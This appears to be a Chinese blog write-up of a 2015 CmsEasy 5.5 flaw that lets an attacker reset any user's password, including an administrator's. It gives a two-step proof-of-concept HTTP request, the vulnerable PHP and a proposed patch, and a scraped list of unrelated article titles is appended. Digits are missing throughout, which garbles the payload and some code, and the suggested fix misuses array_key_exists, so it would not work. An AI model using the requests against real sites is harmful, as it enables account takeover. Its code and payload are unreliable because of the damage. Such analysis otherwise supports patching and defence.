catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

攻击者通过构造特殊的HTTP包,可以直接重置任意用户(包括管理员)的密码

Relevant Link:

http://www.cmseasy.cn/patch/show_919.html

2. 漏洞触发条件

0x1: POC

. 首先利用search_action控制userid的值

http://localhost/CmsEasy_5.5/index.php?case=form&act=search&catid=8&form=my_yingpin

POST

keyword=|userid|i:;""\

. 利用edit_action修改用户密码和其它资料

http://localhost/CmsEasy_5.5/index.php?case=user&act=edit

POST

password=3e503e8736acae9b3893629da7008fc0&nickname=ali&question=ali&answer=ali&qq=&e_mail=%40test.com&tel=&address=&intro=&submit=%E6%8F%%E4%BA%A4

3. 漏洞影响范围

4. 漏洞代码分析

/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

            alerterror('邮箱格式不对');

        }

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

            {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

edit_action函数实现修改用户资料,通过取sesson中的userid字段来更改。所以攻击路径必须能控制生成session中的userid字段,控制生成session的函数位置: /lib/default/form_act.php
我们继续回溯这个漏洞

function search_action()

{

    if(front::get('keyword') &&!front::post('keyword'))

    {

        front::$post['keyword']=front::get('keyword');

    }

    front::check_type(front::post('keyword'),'safe');

    //获取POST数据中的keyword参数

    if(front::post('keyword'))

    {

        $this->view->keyword=trim(front::post('keyword'));

        if(inject_check($this->view->keyword))

        {

            exit('非法请求!');

        }

        //通过恶意检测之后,通过session保存keyword参数

        session::set('keyword',$this->view->keyword);

    }

    else

    {

        session::set('keyword',null);

        $this->view->keyword=session::get('keyword');

    }

    if(inject_check($this->view->keyword))

    {

        exit('非法请求!');

    }

    var_dump($this->view->keyword);

    $type = $this->view->type;

    $condition = "";

    if(front::post('catid'))

    {

        $condition .= "catid = '".front::post('catid')."' AND ";

    }

    $condition .= "(title like '%".$this->view->keyword."%'";

    $sets=settings::getInstance()->getrow(array('tag'=>'table-fieldset'));

    $arr = unserialize($sets['value']);

    if(is_array($arr['archive']) &&!empty($arr['archive']))

    {

        foreach ($arr['archive'] as $v)

        {

            if($v['issearch'] == '')

            {

                $condition .= " OR {$v['name']} like '%{$this->view->keyword}%'";

            }

        }

    }

    $condition .= ")";

    $order = "`listorder` desc,1 DESC";

    $limit=(($this->view->page-)*$this->pagesize).','.$this->pagesize;

    $articles=$this->archive->getrows($condition,$limit,$order);

    foreach($articles as $order=>$arc)

    {

        $articles[$order]['url']=archive::url($arc);

        $articles[$order]['catname']=category::name($arc['catid']);

        $articles[$order]['caturl']=category::url($arc['catid']);

        $articles[$order]['adddate']= sdate($arc['adddate']);

        $articles[$order]['stitle']= strip_tags($arc['title']);

    }

    $this->view->articles=$articles;

    $this->view->archives=$articles;

    $this->view->record_count=$this->archive->record_count;

}

从访问控制的角度来看,这个漏洞有两个原因导致

. session不应该由攻击者随便修改,导致keyword被注入修改,这是一个平行权限漏洞

. 修改密码的入口来自于"用户资料修改",UI界面上只提供了普通身份资料的修改,但是因此MVC框架对POST数据进行了遍历,取出所有字段并进行了数据表更新操作,导致发生了表单字段注入

5. 防御方法

将代码逻辑和UI逻辑进行统一,防止出现表单字段注入
/lib/default/user_act.php

function edit_action()

{

    if(front::post('submit'))

    {

        unset(front::$post['groupid']);

        unset(front::$post['powerlist']);

        if(!is_email(front::$post['e_mail']))

        {

        alerterror('邮箱格式不对');

        }

        /**/

        $tmp = front::$post;

        if ( array_key_exists("password", $tmp['password']) )

        {

        unset($tmp['password']);

        }

        front::$post = $tmp;

        /**/

        foreach (front::$post as $k => $v)

        {

            if(is_array($v) && !empty($v))

        {

                front::$post[$k] = implode(',', $v);

            }

            front::check_type(front::post($k), 'safe');

        }

        //通过取session的userid字段更新该用户资料

        $this->_user->rec_update(front::$post,'userid='.session::get('userid'));

        front::flash(lang('修改资料成功!'));

        front::redirect(url::create('user/index'));

    }

    $this->view->data=$this->view->user;

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

CMSEASY /lib/tool/front_class.php、/lib/default/user_act.php arbitrary user password reset vulnerability的更多相关文章

  1. 创建DLL、Lib以及使用DLL、Lib

    1.要在生成DLL文件的同时生成Lib文件,函数声明时前面要加__declspec(dllexport). 可在头文件中如下定义: #ifndef __MYDLL_H#define __MYDLL_H ...

  2. Singleton、MultiThread、Lib——实现单实例无锁多线程安全API

        前阵子写静态lib导出单实例多线程安全API时,出现了CRITICAL_SECTION初始化太晚的问题,之后查看了错误的资料,引导向了错误的理解,以至于今天凌晨看到另一份代码,也不多想的以为s ...

  3. .h头文件、 .lib库文件、 .dll动态链接库文件之间的关系

    转自.h头文件. .lib库文件. .dll动态链接库文件之间的关系 h头文件作用:声明函数接口 dll动态链接库作用:含有函数的可执行代码 lib库有两种: (1)静态链接库(Static Liba ...

  4. 如何在项目中引入 #include .h、.lib、 .dll、.cpp (转)

    源:http://blog.csdn.net/vippolka/article/details/8552735 在项目中引入.h..lib和dll.以及.cpp 1..h的引入 解决办法1:把  XX ...

  5. [转]静态库、动态库,dll文件、lib文件,隐式链接、显式链接

    转自:https://blog.csdn.net/dcrmg/article/details/53427181 静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方 ...

  6. dll、lib(动态链接库、静态链接库)的区别

    1.dll:dynamic link library: lib:static link library. 2.windows系统中,许多app并不是仅由一个完整的exe构成,而是按功能分成了若干部分, ...

  7. 静态库、动态库,dll文件、lib文件,隐式链接、显式链接浅见

    静态链接.动态链接 静态库和动态库分别应用在静态链接方式和动态链接方式中,所谓静态链接方式是指在程序执行之前完成所有的链接工作,把静态库一起打包合入,生成一个可执行的目标文件(EXE文件).所谓动态链 ...

  8. .lib .dll 区别介绍、使用(dll的两种引入方式)

    .lib .dll文件都是程序可直接引用的文件,前者就是所谓的库文件,后者是动态链接库(Dynamic Link Library)也是一个库文件.而.pdb则可以理解为符号表文件.DLL(Dynami ...

  9. 通过离线安装包解决了 from cryptography.hazmat.bindings._openssl import ffi, lib ImportError: /usr/local/python36/lib/python3.6/site-packages/cryptography-2.2.2-py3.6-linux-x86_64.egg/cryptography/hazmat/binding

    场景:内网服务器不能上外网(代理也不通!), 之前安装了PYTHON的几个安装包,但不是知道为什么无法使用PARAMIKO这个模块 在导入 from cryptography.hazmat.bindi ...

随机推荐

  1. 推薦使用 Microsoft Anti-Cross Site Scripting Library V3.0

    原文出至: http://blog.miniasp.com/post/2009/07/29/Recommand-Microsoft-Anti-Cross-Site-Scripting-Library- ...

  2. C++ 中dynamic_cast<>的使用方法小结 -判断类型-rtti

    将一个基类对象指针(或引用)cast到继承类指针,dynamic_cast会根据基类指针是否真正指向继承类指针来做相应处理          即会作一定的判断.        对指针进行dynamic ...

  3. 运行mvc3.0项目所需dll

    Microsoft.Web.Infrastructure 位置:C:\Program Files\Microsoft ASP.NET\ASP.NET Web Pages\v1.0\Assemblies ...

  4. 跟我学习Storm_Storm基本概念

    首先我们通过一个Storm和Hadoop的对比来了解Storm中的基本概念. 接下来我们再来具体看一下这些概念. Nimbus:负责资源分配和任务调度. Supervisor:负责接受nimbus分配 ...

  5. 解决Cannot change version of project facet Dynamic web module to 2.5

    我们用Eclipse创建Maven结构的web项目的时候选择了Artifact Id为maven-artchetype-webapp,由于这个catalog比较老,用的servlet还是2.3的,而一 ...

  6. [OpenCVsharp]利用指针实现高速访问像素RGB值

    先简单介绍下什么是OpenCVsharp,内容取自百度百科 OpenCvSharp是一个OpenCV的.Net wrapper,应用最新的OpenCV库开发,使用习惯比EmguCV更接近原始的Open ...

  7. Sql视图创建语句

    create view [dbo].[AllUsers] as select u.UserId, u.Firstname, u.Lastname, u.ts, am.Email, au.UserNam ...

  8. SqlServer——全文索引

    当我们想要模糊查询时,之前用like %来进行查询,但是为了提高查询速度,提出了全文索引. 全文索引是用空间换取了时间,它将每个表中的数据进行切分存储,这样就能很快的定位到模糊查询的数据. 全文索引快 ...

  9. python 2.7 简单模拟登陆网站

    举个栗子,首先创建网络会话, 然后就可以用创建的session来访问网页了. session.get(URL) #-*- coding:utf-8 -*- import requests import ...

  10. python基础-编码_if条件判断

    一.第一句Python代码 在 /home/dev/ 目录下创建 hello.py 文件,内容如下: [root@python-3 scripts]# cat hello.py #!/usr/bin/ ...